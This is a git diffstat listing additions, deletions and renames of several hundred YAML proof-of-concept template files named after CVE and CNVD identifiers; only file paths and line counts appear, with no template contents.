poc/cve/CVE-2018-0101.yaml | 7 +- poc/cve/CVE-2018-1000226.yaml | 54 +- poc/cve/CVE-2018-1000856.yaml | 24 +- poc/cve/CVE-2018-10230.yaml | 23 +- poc/cve/CVE-2018-10818.yaml | 29 +- poc/cve/CVE-2018-11231.yaml | 31 +- poc/cve/CVE-2018-14064.yaml | 21 +- poc/cve/CVE-2018-14912.yaml | 27 +- poc/cve/CVE-2018-15517.yaml | 28 +- poc/cve/CVE-2018-15535.yaml | 22 +- poc/cve/CVE-2018-16133.yaml | 23 +- poc/cve/CVE-2018-16167.yaml | 25 +- poc/cve/CVE-2018-16288.yaml | 23 +- poc/cve/CVE-2018-17422.yaml | 33 +- poc/cve/CVE-2018-17431.yaml | 25 +- poc/cve/CVE-2018-18608.yaml | 24 +- poc/cve/CVE-2018-19752.yaml | 28 +- poc/cve/CVE-2018-19877.yaml | 25 +- poc/cve/CVE-2018-20010.yaml | 26 +- poc/cve/CVE-2018-20011.yaml | 24 +- poc/cve/CVE-2018-20462.yaml | 29 +- poc/cve/CVE-2018-20470.yaml | 18 +- poc/cve/CVE-2018-20985.yaml | 24 +- poc/cve/CVE-2018-5233.yaml | 38 +- poc/cve/CVE-2018-5316.yaml | 36 +- poc/cve/CVE-2018-6008.yaml | 18 +- poc/cve/CVE-2018-6200.yaml | 21 +- poc/cve/CVE-2018-6910.yaml | 20 +- poc/cve/CVE-2018-7251.yaml | 32 +- poc/cve/CVE-2018-7467.yaml | 23 +- poc/cve/CVE-2018-7700.yaml | 34 +- poc/cve/CVE-2018-9118.yaml | 18 +- "poc/cve/CVE-2018\342\200\22314064.yaml" | 9 +- poc/cve/CVE-2019-1010287.yaml | 31 +- poc/cve/CVE-2019-10692.yaml | 33 +- poc/cve/CVE-2019-11013.yaml | 34 +- poc/cve/CVE-2019-11248.yaml | 16 +- poc/cve/CVE-2019-11370.yaml | 23 +- poc/cve/CVE-2019-12276.yaml | 82 +- poc/cve/CVE-2019-12962.yaml | 27 +- poc/cve/CVE-2019-13101.yaml | 33 +- poc/cve/CVE-2019-14251.yaml | 22 +- poc/cve/CVE-2019-15713.yaml | 24 +- poc/cve/CVE-2019-16123.yaml | 25 +- poc/cve/CVE-2019-16931.yaml | 28 +- poc/cve/CVE-2019-17418.yaml | 28 +- poc/cve/CVE-2019-18665.yaml | 23 +- poc/cve/CVE-2019-18818.yaml | 39 +- poc/cve/CVE-2019-19824.yaml | 20 +- poc/cve/CVE-2019-20210.yaml | 27 +- poc/cve/CVE-2019-20224.yaml | 25 +- poc/cve/CVE-2019-20933.yaml | 42 +- poc/cve/CVE-2019-2616.yaml | 23 +- poc/cve/CVE-2019-2767.yaml | 23 +- poc/cve/CVE-2019-6340.yaml | 29 +- poc/cve/CVE-2019-7238.yaml | 26 +- poc/cve/CVE-2019-7609.yaml | 35 +- poc/cve/CVE-2019-8446.yaml | 28 +- poc/cve/CVE-2019-8937.yaml | 53 +- poc/cve/CVE-2019-9082 (copy 2).yaml | 24 + poc/cve/CVE-2019-9082.yaml | 1 - poc/cve/CVE-2019-9915.yaml | 24 +- poc/cve/CVE-2020-10124 (copy 1).yaml | 32 - poc/cve/CVE-2020-10124.yaml | 3 +- poc/cve/CVE-2020-11455.yaml | 29 +- poc/cve/CVE-2020-11738.yaml | 38 +- poc/cve/CVE-2020-11978.yaml | 46 +- poc/cve/CVE-2020-11991.yaml | 93 +- poc/cve/CVE-2020-13117.yaml | 36 +- poc/cve/CVE-2020-13121.yaml | 41 +- poc/cve/CVE-2020-13945.yaml | 22 +- poc/cve/CVE-2020-14408.yaml | 29 +- poc/cve/CVE-2020-19282.yaml | 31 +- poc/cve/CVE-2020-19360.yaml | 21 +- poc/cve/CVE-2020-2036.yaml | 69 +- poc/cve/CVE-2020-20982.yaml | 33 +- poc/cve/CVE-2020-22211.yaml | 19 +- poc/cve/CVE-2020-24391.yaml | 22 +- poc/cve/CVE-2020-27467.yaml | 18 +- poc/cve/CVE-2020-27735.yaml | 85 +- poc/cve/CVE-2020-28871.yaml | 36 +- poc/cve/CVE-2020-28976.yaml | 42 +- poc/cve/CVE-2020-29227.yaml | 18 +- poc/cve/CVE-2020-35749.yaml | 19 +- poc/cve/CVE-2020-35848.yaml | 39 +- poc/cve/CVE-2020-36510.yaml | 29 +- poc/cve/CVE-2020-5307.yaml | 83 +- poc/cve/CVE-2020-7980.yaml | 22 +- poc/cve/CVE-2020-8497.yaml | 20 +- poc/cve/CVE-2020-8641.yaml | 22 +- poc/cve/CVE-2020-8644.yaml | 40 +- poc/cve/CVE-2020-8654.yaml | 42 +- poc/cve/CVE-2020-9043.yaml | 36 +- poc/cve/CVE-2020-9483.yaml | 99 +- poc/cve/CVE-20200924a.yaml | 6 + poc/cve/CVE-2021-20038.yaml | 50 +- poc/cve/CVE-2021-20090.yaml | 88 +- poc/cve/CVE-2021-20837.yaml | 52 +- poc/cve/CVE-2021-21287.yaml | 18 +- poc/cve/CVE-2021-21745.yaml | 20 +- poc/cve/CVE-2021-21801.yaml | 31 +- poc/cve/CVE-2021-21803.yaml | 34 +- poc/cve/CVE-2021-22054.yaml | 17 +- poc/cve/CVE-2021-22145.yaml | 33 +- poc/cve/CVE-2021-22214.yaml | 25 +- poc/cve/CVE-2021-22986.yaml | 45 +- poc/cve/CVE-2021-23241.yaml | 24 +- poc/cve/CVE-2021-24146.yaml | 31 +- poc/cve/CVE-2021-24236.yaml | 31 +- poc/cve/CVE-2021-24275.yaml | 37 +- poc/cve/CVE-2021-24284.yaml | 25 +- poc/cve/CVE-2021-24285.yaml | 35 +- poc/cve/CVE-2021-24286.yaml | 63 +- poc/cve/CVE-2021-24335.yaml | 29 +- poc/cve/CVE-2021-24364.yaml | 26 +- poc/cve/CVE-2021-24488.yaml | 24 +- poc/cve/CVE-2021-24498.yaml | 37 +- poc/cve/CVE-2021-24762.yaml | 38 +- poc/cve/CVE-2021-24838.yaml | 32 +- poc/cve/CVE-2021-24997.yaml | 33 +- poc/cve/CVE-2021-25028.yaml | 34 +- poc/cve/CVE-2021-25033.yaml | 22 +- poc/cve/CVE-2021-25075.yaml | 26 +- poc/cve/CVE-2021-25085.yaml | 24 +- poc/cve/CVE-2021-25112.yaml | 34 +- poc/cve/CVE-2021-25118.yaml | 35 +- poc/cve/CVE-2021-26085.yaml | 35 +- poc/cve/CVE-2021-26598.yaml | 32 +- poc/cve/CVE-2021-27519.yaml | 26 +- poc/cve/CVE-2021-27561.yaml | 18 +- poc/cve/CVE-2021-27748.yaml | 22 +- poc/cve/CVE-2021-28149.yaml | 33 +- poc/cve/CVE-2021-28150.yaml | 38 +- poc/cve/CVE-2021-28377.yaml | 21 +- poc/cve/CVE-2021-28918.yaml | 23 +- poc/cve/CVE-2021-29490.yaml | 37 +- poc/cve/CVE-2021-31249.yaml | 37 +- poc/cve/CVE-2021-31589.yaml | 39 +- poc/cve/CVE-2021-31682.yaml | 36 +- poc/cve/CVE-2021-31805.yaml | 21 +- poc/cve/CVE-2021-3223.yaml | 29 +- poc/cve/CVE-2021-32305.yaml | 19 +- poc/cve/CVE-2021-32618.yaml | 22 +- poc/cve/CVE-2021-33044.yaml | 33 +- poc/cve/CVE-2021-33544.yaml | 37 +- poc/cve/CVE-2021-33807.yaml | 24 +- poc/cve/CVE-2021-34370.yaml | 38 +- poc/cve/CVE-2021-34643.yaml | 37 +- poc/cve/CVE-2021-35265.yaml | 42 +- poc/cve/CVE-2021-35587.yaml | 37 +- poc/cve/CVE-2021-36356.yaml | 31 +- poc/cve/CVE-2021-37216.yaml | 40 +- poc/cve/CVE-2021-37416.yaml | 36 +- poc/cve/CVE-2021-37580.yaml | 18 +- poc/cve/CVE-2021-38702.yaml | 28 +- poc/cve/CVE-2021-38704.yaml | 20 +- poc/cve/CVE-2021-38751.yaml | 25 +- poc/cve/CVE-2021-39211.yaml | 23 +- poc/cve/CVE-2021-39226.yaml | 38 +- poc/cve/CVE-2021-39312.yaml | 23 +- poc/cve/CVE-2021-40868.yaml | 29 +- poc/cve/CVE-2021-40870.yaml | 36 +- poc/cve/CVE-2021-40960.yaml | 23 +- poc/cve/CVE-2021-40978.yaml | 26 +- poc/cve/CVE-2021-41192.yaml | 29 +- poc/cve/CVE-2021-41266.yaml | 31 +- poc/cve/CVE-2021-41291.yaml | 22 +- poc/cve/CVE-2021-41569.yaml | 22 +- poc/cve/CVE-2021-41653.yaml | 29 +- poc/cve/CVE-2021-41691.yaml | 19 +- poc/cve/CVE-2021-4191.yaml | 25 +- poc/cve/CVE-2021-42258.yaml | 49 +- poc/cve/CVE-2021-43798.yaml | 43 +- poc/cve/CVE-2021-44103.yaml | 14 +- poc/cve/CVE-2021-44228.yaml | 78 +- poc/cve/CVE-2021-44451.yaml | 71 +- poc/cve/CVE-2021-44521.yaml | 50 +- poc/cve/CVE-2021-44528.yaml | 28 +- poc/cve/CVE-2021-45428.yaml | 21 +- poc/cve/CVE-2021-45967.yaml | 27 +- poc/cve/CVE-2021-45968.yaml | 28 +- poc/cve/CVE-2021-46005.yaml | 25 +- poc/cve/CVE-2021-46379.yaml | 17 +- poc/cve/CVE-2021-46381.yaml | 22 +- poc/cve/CVE-2021-46417.yaml | 20 +- poc/cve/CVE-2021-46422.yaml | 24 +- poc/cve/CVE-2022-0208.yaml | 37 +- poc/cve/CVE-2022-0281.yaml | 31 +- poc/cve/CVE-2022-0543.yaml | 30 +- poc/cve/CVE-2022-0594.yaml | 26 +- poc/cve/CVE-2022-0599.yaml | 35 +- poc/cve/CVE-2022-0921.yaml | 57 + poc/cve/CVE-2022-0952.yaml | 28 +- poc/cve/CVE-2022-0968.yaml | 42 +- poc/cve/CVE-2022-1020.yaml | 26 +- poc/cve/CVE-2022-1221.yaml | 27 +- poc/cve/CVE-2022-1392.yaml | 21 +- poc/cve/CVE-2022-1597.yaml | 31 +- poc/cve/CVE-2022-1713.yaml | 19 +- poc/cve/CVE-2022-1815.yaml | 26 +- poc/cve/CVE-2022-1904.yaml | 27 +- poc/cve/CVE-2022-1906.yaml | 28 +- poc/cve/CVE-2022-1937.yaml | 27 +- poc/cve/CVE-2022-21705.yaml | 71 +- poc/cve/CVE-2022-2187.yaml | 26 +- poc/cve/CVE-2022-22536.yaml | 36 +- poc/cve/CVE-2022-2290.yaml | 27 +- poc/cve/CVE-2022-22972.yaml | 64 +- poc/cve/CVE-2022-23808.yaml | 51 +- poc/cve/CVE-2022-23944.yaml | 26 +- poc/cve/CVE-2022-24681.yaml | 41 +- poc/cve/CVE-2022-2486.yaml | 24 +- poc/cve/CVE-2022-2487.yaml | 27 +- poc/cve/CVE-2022-24899.yaml | 22 +- poc/cve/CVE-2022-25323.yaml | 32 +- poc/cve/CVE-2022-26134.yaml | 30 +- poc/cve/CVE-2022-26135.yaml | 4 + poc/cve/CVE-2022-26352.yaml | 23 +- poc/cve/CVE-2022-26564.yaml | 23 +- poc/cve/CVE-2022-26960.yaml | 17 +- poc/cve/CVE-2022-27927.yaml | 22 +- poc/cve/CVE-2022-28079.yaml | 22 +- poc/cve/CVE-2022-28080.yaml | 25 +- poc/cve/CVE-2022-29014.yaml | 25 +- poc/cve/CVE-2022-29299.yaml | 14 +- poc/cve/CVE-2022-29303.yaml | 27 +- poc/cve/CVE-2022-29548.yaml | 31 +- poc/cve/CVE-2022-30073.yaml | 42 +- poc/cve/CVE-2022-30489.yaml | 24 +- poc/cve/CVE-2022-30776.yaml | 25 +- poc/cve/CVE-2022-30777.yaml | 26 +- poc/cve/CVE-2022-32007.yaml | 21 +- poc/cve/CVE-2022-32025.yaml | 27 +- poc/cve/CVE-2022-32028.yaml | 27 +- poc/cve/CVE-2022-32409.yaml | 25 +- poc/cve/CVE-2022-32444.yaml | 16 +- poc/cve/CVE-2022-33119.yaml | 22 +- poc/cve/CVE-2022-34046.yaml | 29 +- poc/cve/CVE-2022-34047.yaml | 29 +- poc/cve/CVE-2022-34048.yaml | 26 +- poc/cve/CVE-2022-34049.yaml | 23 +- poc/cve/CVE-2022-35416.yaml | 22 +- poc/cve/CVE-2023-23752.yaml | 52 +- poc/cve/CVE-2023-34039.yaml | 67 + poc/cve/CVE-2023-35047.yaml | 2 +- poc/cve/CVE-2023-3836.yaml | 78 +- poc/cve/CVE-2024-1183.yaml | 36 + poc/cve/CVE-2024-32651.yaml | 57 + poc/cve/CVE-2024-35668.yaml | 59 + poc/cve/CVE-2024-3668.yaml | 59 + poc/cve/CVE-2024-4468.yaml | 59 + poc/cve/CVE-2024-4661.yaml | 59 + poc/cve/CVE-2024-5087.yaml | 59 + poc/cve/CVE-2024-5091.yaml | 59 + poc/cve/CVE-2024-5613.yaml | 59 + poc/cve/CVE-2024-5638.yaml | 59 + poc/cve/CVE-2024-5654.yaml | 59 + poc/cve/CVE-2024-5663.yaml | 59 + poc/cve/CVE-2024-5758.yaml | 59 + ...5770-535af98dd21b180aed9353b26ab61bf4.yaml | 59 + poc/cve/cnvd-2018-13393-1037.yaml | 12 +- poc/cve/cnvd-2019-01348-1040.yaml | 7 +- poc/cve/cnvd-2019-01348-1042.yaml | 33 - poc/cve/cnvd-2019-01348-1043.yaml | 4 +- poc/cve/cnvd-2019-01348-1044.yaml | 25 + poc/cve/cnvd-2019-06255-1046.yaml | 37 + poc/cve/cnvd-2019-06255-1050.yaml | 23 - poc/cve/cnvd-2019-32204-1053.yaml | 23 + poc/cve/cnvd-2019-32204-1054.yaml | 27 - ...67-1064.yaml => cnvd-2020-56167-1061.yaml} | 0 ...22-1068.yaml => cnvd-2020-62422-1069.yaml} | 0 poc/cve/cnvd-2020-68596-1073.yaml | 36 - poc/cve/cnvd-2020-68596-1074.yaml | 44 + poc/cve/cnvd-2021-01931-1077.yaml | 16 +- poc/cve/cnvd-2021-01931-1078.yaml | 26 + poc/cve/cnvd-2021-10543-1082.yaml | 21 - poc/cve/cnvd-2021-10543-1086.yaml | 6 +- ...36-1088.yaml => cnvd-2021-14536-1087.yaml} | 0 poc/cve/cnvd-2021-15822-1089.yaml | 27 - poc/cve/cnvd-2021-15822-1093.yaml | 22 + poc/cve/cnvd-2021-15822-1095.yaml | 7 +- ...24-1096.yaml => cnvd-2021-15824-1097.yaml} | 0 poc/cve/cnvd-2021-17369-1102.yaml | 12 +- poc/cve/cnvd-2021-26422-1103.yaml | 38 - poc/cve/cnvd-2021-28277-1105.yaml | 51 + poc/cve/cnvd-2021-28277-1107.yaml | 10 +- poc/cve/cnvd-2021-30167-1108.yaml | 36 - ...04-1113.yaml => cnvd-2021-49104-1114.yaml} | 0 poc/cve/cnvd-2022-03672-1116.yaml | 42 + poc/cve/cnvd-2022-03672-1117.yaml | 45 - poc/cve/cve-2000-0114-1297.yaml | 32 + poc/cve/cve-2002-1131-1304.yaml | 43 + poc/cve/cve-2007-4504-1342.yaml | 25 - poc/cve/cve-2008-6222.yaml | 31 + poc/cve/cve-2008-6668-1400.yaml | 28 - poc/cve/cve-2009-0545.yaml | 40 + poc/cve/cve-2009-1496.yaml | 31 - poc/cve/cve-2009-2015-1441.yaml | 26 - poc/cve/cve-2009-2100-1446.yaml | 37 - poc/cve/cve-2009-3053.yaml | 31 - poc/cve/cve-2010-0943.yaml | 30 + poc/cve/cve-2010-0972-1522.yaml | 26 - poc/cve/cve-2010-0982.yaml | 30 + poc/cve/cve-2010-1056.yaml | 30 - poc/cve/cve-2010-1302-1567.yaml | 28 - poc/cve/cve-2010-1305-1574.yaml | 26 - poc/cve/cve-2010-1307-1585.yaml | 26 - poc/cve/cve-2010-1308.yaml | 29 - poc/cve/cve-2010-1312-1598.yaml | 28 + poc/cve/cve-2010-1312.yaml | 30 + poc/cve/cve-2010-1313-1604.yaml | 30 + poc/cve/cve-2010-1314.yaml | 30 - poc/cve/cve-2010-1315.yaml | 30 + poc/cve/cve-2010-1345-1621.yaml | 27 + poc/cve/cve-2010-1345.yaml | 29 + poc/cve/cve-2010-1352.yaml | 30 - poc/cve/cve-2010-1353-1630.yaml | 28 - poc/cve/cve-2010-1469.yaml | 30 + poc/cve/cve-2010-1470-1653.yaml | 30 + poc/cve/cve-2010-1474.yaml | 29 - poc/cve/cve-2010-1491.yaml | 30 - poc/cve/cve-2010-1494.yaml | 29 + poc/cve/cve-2010-1532.yaml | 30 - poc/cve/cve-2010-1540-1729.yaml | 28 - poc/cve/cve-2010-1657-1761.yaml | 27 - poc/cve/cve-2010-1658-1765.yaml | 28 + poc/cve/cve-2010-1658.yaml | 30 + poc/cve/cve-2010-1659-1773.yaml | 28 - poc/cve/cve-2010-1714-1779.yaml | 30 + poc/cve/cve-2010-1715.yaml | 30 - poc/cve/cve-2010-1717-1789.yaml | 30 - poc/cve/cve-2010-1718.yaml | 30 - poc/cve/cve-2010-1858.yaml | 30 - poc/cve/cve-2010-1953-1841.yaml | 27 + poc/cve/cve-2010-1981.yaml | 34 + poc/cve/cve-2010-1982.yaml | 34 + poc/cve/cve-2010-2682-1960.yaml | 32 + poc/cve/cve-2010-2920.yaml | 33 - poc/cve/cve-2010-3203-1987.yaml | 34 + poc/cve/cve-2010-3203.yaml | 34 + poc/cve/cve-2010-4239-1997.yaml | 28 - poc/cve/cve-2010-4617.yaml | 33 - poc/cve/cve-2010-5028-2025.yaml | 29 + poc/cve/cve-2010-5278-2030.yaml | 32 + poc/cve/cve-2010-5278.yaml | 35 + poc/cve/cve-2011-2744.yaml | 33 - poc/cve/cve-2011-3315-2059.yaml | 25 - poc/cve/cve-2011-4926.yaml | 51 + poc/cve/cve-2011-5179.yaml | 48 - poc/cve/cve-2012-0896-2132.yaml | 31 - poc/cve/cve-2012-0981.yaml | 33 + poc/cve/cve-2012-2371.yaml | 50 + poc/cve/cve-2012-4273-2198.yaml | 33 + poc/cve/cve-2012-4768-2207.yaml | 32 + poc/cve/cve-2013-5528.yaml | 33 - poc/cve/cve-2013-5979-2280.yaml | 28 - poc/cve/cve-2013-7240.yaml | 40 + poc/cve/cve-2014-2962-2313.yaml | 25 + poc/cve/cve-2014-4561-2375.yaml | 35 - poc/cve/cve-2014-4940.yaml | 32 - poc/cve/cve-2014-9094.yaml | 49 + poc/cve/cve-2014-9606-2430.yaml | 35 + poc/cve/cve-2014-9609-2437.yaml | 33 + poc/cve/cve-2015-0554-2456.yaml | 32 - poc/cve/cve-2015-1880-2477.yaml | 31 - poc/cve/cve-2015-2166.yaml | 33 - poc/cve/cve-2015-3306-2502.yaml | 32 - poc/cve/cve-2015-4050.yaml | 27 - poc/cve/cve-2015-7780-2604.yaml | 36 + poc/cve/cve-2016-1000128-2651.yaml | 32 - poc/cve/cve-2016-1000132-2669.yaml | 41 - poc/cve/cve-2016-1000134-2678.yaml | 41 - poc/cve/cve-2016-1000143-2717.yaml | 33 - poc/cve/cve-2016-1000154-2740.yaml | 34 + poc/cve/cve-2016-10940-2757.yaml | 45 - poc/cve/cve-2016-6210.yaml | 33 - poc/cve/cve-2016-7552-2812.yaml | 34 - poc/cve/cve-2017-12542-2884.yaml | 38 + poc/cve/cve-2017-12615.yaml | 70 - poc/cve/cve-2017-14535-2928.yaml | 38 - poc/cve/cve-2017-15647-2955.yaml | 28 - poc/cve/cve-2017-15944-2965.yaml | 33 + poc/cve/cve-2017-17451-2983.yaml | 34 - poc/cve/cve-2017-18536-2995.yaml | 32 - poc/cve/cve-2017-3528-3012.yaml | 28 - poc/cve/cve-2017-5487.yaml | 67 - poc/cve/cve-2017-5521-3027.yaml | 40 + poc/cve/cve-2017-5631-3031.yaml | 34 + poc/cve/cve-2017-6090-3044.yaml | 44 - poc/cve/cve-2017-7391.yaml | 49 - poc/cve/cve-2017-8917-3078.yaml | 29 + poc/cve/cve-2017-9805-3104.yaml | 93 + poc/cve/cve-2017-9822-3106.yaml | 36 + poc/cve/cve-2018-1000129.yaml | 57 + poc/cve/cve-2018-1000226-3139.yaml | 51 - poc/cve/cve-2018-10818-3171.yaml | 40 - poc/cve/cve-2018-11409.yaml | 46 + poc/cve/cve-2018-1271.yaml | 23 +- poc/cve/cve-2018-14064-3301.yaml | 30 - poc/cve/cve-2018-14728.yaml | 40 - poc/cve/cve-2018-14912-3315.yaml | 27 - poc/cve/cve-2018-15517-3331.yaml | 29 - poc/cve/cve-2018-16133-3358.yaml | 31 - poc/cve/cve-2018-16167-3359.yaml | 29 + poc/cve/cve-2018-16288-3365.yaml | 32 + poc/cve/cve-2018-17422-3421.yaml | 34 - poc/cve/cve-2018-17431-3423.yaml | 38 + poc/cve/cve-2018-19386.yaml | 42 - poc/cve/cve-2018-19752(1).yaml | 52 - poc/cve/cve-2018-19877(1).yaml | 35 - poc/cve/cve-2018-20010(1).yaml | 47 - poc/cve/cve-2018-20011(1).yaml | 47 + poc/cve/cve-2018-20470-3497.yaml | 39 - poc/cve/cve-2018-20985-3507.yaml | 35 - poc/cve/cve-2018-3167.yaml | 47 - poc/cve/cve-2018-5233-3567.yaml | 34 - poc/cve/cve-2018-6008-3574.yaml | 36 + poc/cve/cve-2018-6200-3578.yaml | 32 - poc/cve/cve-2018-6910-3585.yaml | 31 + poc/cve/cve-2018-7251-3587.yaml | 31 - poc/cve/cve-2018-7467-3598.yaml | 31 + poc/cve/cve-2018-7700-3618.yaml | 33 + poc/cve/cve-2018-9118-3654.yaml | 39 - "poc/cve/cve-2018\342\200\22314064(1).yaml" | 21 + poc/cve/cve-2019-1010287-3696.yaml | 36 + poc/cve/cve-2019-10692(1).yaml | 35 + poc/cve/cve-2019-11013-3719.yaml | 19 + poc/cve/cve-2019-11248-3731.yaml | 37 - poc/cve/cve-2019-11370(1).yaml | 39 - poc/cve/cve-2019-12962(1).yaml | 40 + poc/cve/cve-2019-13101-3802.yaml | 37 - poc/cve/cve-2019-14251(1).yaml | 31 + poc/cve/cve-2019-15713-3887.yaml | 37 + poc/cve/cve-2019-16097.yaml | 54 - poc/cve/cve-2019-16123-3918.yaml | 31 - poc/cve/cve-2019-16278.yaml | 44 + poc/cve/cve-2019-16931(1).yaml | 41 - poc/cve/cve-2019-17418-3981.yaml | 30 - poc/cve/cve-2019-17558.yaml | 74 + poc/cve/cve-2019-18394.yaml | 39 + poc/cve/cve-2019-18665(1).yaml | 30 + poc/cve/cve-2019-18818-4021.yaml | 52 + poc/cve/cve-2019-19368.yaml | 44 + poc/cve/cve-2019-19824-4053.yaml | 33 - poc/cve/cve-2019-20210(1).yaml | 37 - poc/cve/cve-2019-20224(1).yaml | 48 - poc/cve/cve-2019-20933(1).yaml | 32 + poc/cve/cve-2019-2616(1).yaml | 29 - poc/cve/cve-2019-2767-4117.yaml | 27 - poc/cve/cve-2019-6340(1).yaml | 34 + poc/cve/cve-2019-7238-4207.yaml | 37 + poc/cve/cve-2019-7609-4233.yaml | 35 + poc/cve/cve-2019-8446-4252.yaml | 39 - poc/cve/cve-2019-8903.yaml | 45 - poc/cve/cve-2019-8937-4278.yaml | 36 + poc/cve/cve-2019-9082-4292.yaml | 23 - poc/cve/cve-2019-9915(1).yaml | 32 + poc/cve/cve-2020-10124(1).yaml | 31 + poc/cve/cve-2020-10220.yaml | 50 - poc/cve/cve-2020-11455-4397.yaml | 32 - poc/cve/cve-2020-11530.yaml | 48 + poc/cve/cve-2020-11738(1).yaml | 45 + poc/cve/cve-2020-11978(1).yaml | 57 + poc/cve/cve-2020-13117-4489.yaml | 29 + poc/cve/cve-2020-13121(1).yaml | 24 + poc/cve/cve-2020-13945-4535.yaml | 58 + poc/cve/cve-2020-14181.yaml | 45 - poc/cve/cve-2020-14408(1).yaml | 35 - poc/cve/cve-2020-14882.yaml | 46 + poc/cve/cve-2020-19282-4706.yaml | 33 - poc/cve/cve-2020-19360-4714.yaml | 30 + poc/cve/cve-2020-2036-4730.yaml | 34 - poc/cve/cve-2020-20982-4740.yaml | 35 - poc/cve/cve-2020-22211(1).yaml | 32 - poc/cve/cve-2020-22840.yaml | 39 + poc/cve/cve-2020-24223.yaml | 49 + poc/cve/cve-2020-24391-4811.yaml | 53 - poc/cve/cve-2020-25540.yaml | 44 - poc/cve/cve-2020-27467-4950.yaml | 31 - poc/cve/cve-2020-28976-4989.yaml | 30 + poc/cve/cve-2020-29227-5000.yaml | 30 + poc/cve/cve-2020-29395.yaml | 50 + poc/cve/cve-2020-3452(1).yaml | 31 + poc/cve/cve-2020-3452.yaml | 24 +- poc/cve/cve-2020-35749-5075.yaml | 46 + poc/cve/cve-2020-36510(1).yaml | 35 + poc/cve/cve-2020-6287.yaml | 64 - poc/cve/cve-2020-7980(1).yaml | 40 - poc/cve/cve-2020-8194.yaml | 49 + poc/cve/cve-2020-8497-5317.yaml | 32 + poc/cve/cve-2020-8641-5330.yaml | 32 + poc/cve/cve-2020-8654(1).yaml | 41 + poc/cve/cve-2020-9043(1).yaml | 64 + poc/cve/cve-20200924a.yaml | 33 + poc/cve/cve-2021-20038-5443.yaml | 38 + poc/cve/cve-2021-21287-5492.yaml | 38 - poc/cve/cve-2021-21745(1).yaml | 34 + poc/cve/cve-2021-21801-5531.yaml | 32 + poc/cve/cve-2021-21803-5536.yaml | 27 + poc/cve/cve-2021-22054(1).yaml | 32 + poc/cve/cve-2021-22145-5591.yaml | 37 + poc/cve/cve-2021-22214-5601.yaml | 41 - poc/cve/cve-2021-22986-5612.yaml | 60 + poc/cve/cve-2021-23241-5621.yaml | 30 + poc/cve/cve-2021-24146-5631.yaml | 32 - poc/cve/cve-2021-24236(1).yaml | 80 - poc/cve/cve-2021-24275-5661.yaml | 32 - poc/cve/cve-2021-24284(1).yaml | 62 - poc/cve/cve-2021-24285-5673.yaml | 33 - poc/cve/cve-2021-24286(1).yaml | 21 - poc/cve/cve-2021-24335-5703.yaml | 34 + poc/cve/cve-2021-24364-5721.yaml | 32 + poc/cve/cve-2021-24488(1).yaml | 40 + poc/cve/cve-2021-24498-5751.yaml | 31 - poc/cve/cve-2021-24838-5769.yaml | 28 - poc/cve/cve-2021-25033(1).yaml | 27 - poc/cve/cve-2021-25075(1).yaml | 53 - poc/cve/cve-2021-25085(1).yaml | 37 + poc/cve/cve-2021-25118(1).yaml | 39 + poc/cve/cve-2021-26085(1).yaml | 34 + poc/cve/cve-2021-27519(1).yaml | 38 - poc/cve/cve-2021-27748(1).yaml | 33 + poc/cve/cve-2021-28149-5943.yaml | 43 - poc/cve/cve-2021-28150-5949.yaml | 39 - poc/cve/cve-2021-28377(1).yaml | 27 + poc/cve/cve-2021-28918-5975.yaml | 37 + poc/cve/cve-2021-29490-6011.yaml | 28 + poc/cve/cve-2021-29622.yaml | 38 - poc/cve/cve-2021-30461.yaml | 38 + poc/cve/cve-2021-31249-6068.yaml | 23 - poc/cve/cve-2021-3129.yaml | 94 - poc/cve/cve-2021-31589-6095.yaml | 35 + poc/cve/cve-2021-31682-6102.yaml | 36 - poc/cve/cve-2021-31805(1).yaml | 48 - poc/cve/cve-2021-3223(1).yaml | 35 - poc/cve/cve-2021-32305-6134.yaml | 31 + poc/cve/cve-2021-33544-6176.yaml | 23 + poc/cve/cve-2021-33807-6211.yaml | 38 + poc/cve/cve-2021-34370-6221.yaml | 17 + poc/cve/cve-2021-34643-6238.yaml | 42 - poc/cve/cve-2021-35265-6245.yaml | 33 - poc/cve/cve-2021-36356(1).yaml | 35 + poc/cve/cve-2021-37216-6280.yaml | 35 - poc/cve/cve-2021-37416(1).yaml | 38 + poc/cve/cve-2021-37580-6292.yaml | 36 + poc/cve/cve-2021-38702-6314.yaml | 34 + poc/cve/cve-2021-38704-6317.yaml | 37 - poc/cve/cve-2021-38751-6320.yaml | 36 + poc/cve/cve-2021-39211(1).yaml | 31 + poc/cve/cve-2021-39226-6323.yaml | 30 + poc/cve/cve-2021-39312(1).yaml | 40 - poc/cve/cve-2021-41569(1).yaml | 28 - poc/cve/cve-2021-41691-6460.yaml | 45 - poc/cve/cve-2021-44103(1).yaml | 69 - poc/cve/cve-2021-44521-6556.yaml | 56 + poc/cve/cve-2021-44528(1).yaml | 35 + poc/cve/cve-2021-45428(1).yaml | 43 + poc/cve/cve-2021-45968-6588.yaml | 36 - poc/cve/cve-2021-46381-6597.yaml | 26 - poc/cve/cve-2021-46417(1).yaml | 32 + poc/cve/cve-2021-46422(1).yaml | 40 + poc/cve/cve-2022-0208(1).yaml | 34 - poc/cve/cve-2022-0543(1).yaml | 35 - poc/cve/cve-2022-0594(1).yaml | 37 + poc/cve/cve-2022-0599(1).yaml | 41 + poc/cve/cve-2022-0952(1).yaml | 47 + poc/cve/cve-2022-0968(1).yaml | 68 - poc/cve/cve-2022-1020(1).yaml | 41 - poc/cve/cve-2022-1221(1).yaml | 37 - poc/cve/cve-2022-1392(1).yaml | 34 + poc/cve/cve-2022-1597(1).yaml | 56 - poc/cve/cve-2022-1713(1).yaml | 37 - poc/cve/cve-2022-1815(1).yaml | 31 - poc/cve/cve-2022-1904(1).yaml | 35 - poc/cve/cve-2022-1906(1).yaml | 39 + poc/cve/cve-2022-1937(1).yaml | 38 - poc/cve/cve-2022-21705(1).yaml | 94 - poc/cve/cve-2022-2187(1).yaml | 36 + poc/cve/cve-2022-22536-6662.yaml | 56 + poc/cve/cve-2022-2290(1).yaml | 42 - poc/cve/cve-2022-22972(1).yaml | 93 + poc/cve/cve-2022-24681(1).yaml | 43 - poc/cve/cve-2022-2486(1).yaml | 34 + poc/cve/cve-2022-2487(1).yaml | 42 - poc/cve/cve-2022-24899(1).yaml | 35 - poc/cve/cve-2022-25323-6724.yaml | 24 - poc/cve/cve-2022-26134(1).yaml | 45 - poc/cve/cve-2022-26135(1).yaml | 28 + poc/cve/cve-2022-26352(1).yaml | 41 - poc/cve/cve-2022-26564(1).yaml | 41 - poc/cve/cve-2022-26960(1).yaml | 36 + poc/cve/cve-2022-27927(1).yaml | 38 - poc/cve/cve-2022-28079(1).yaml | 38 + 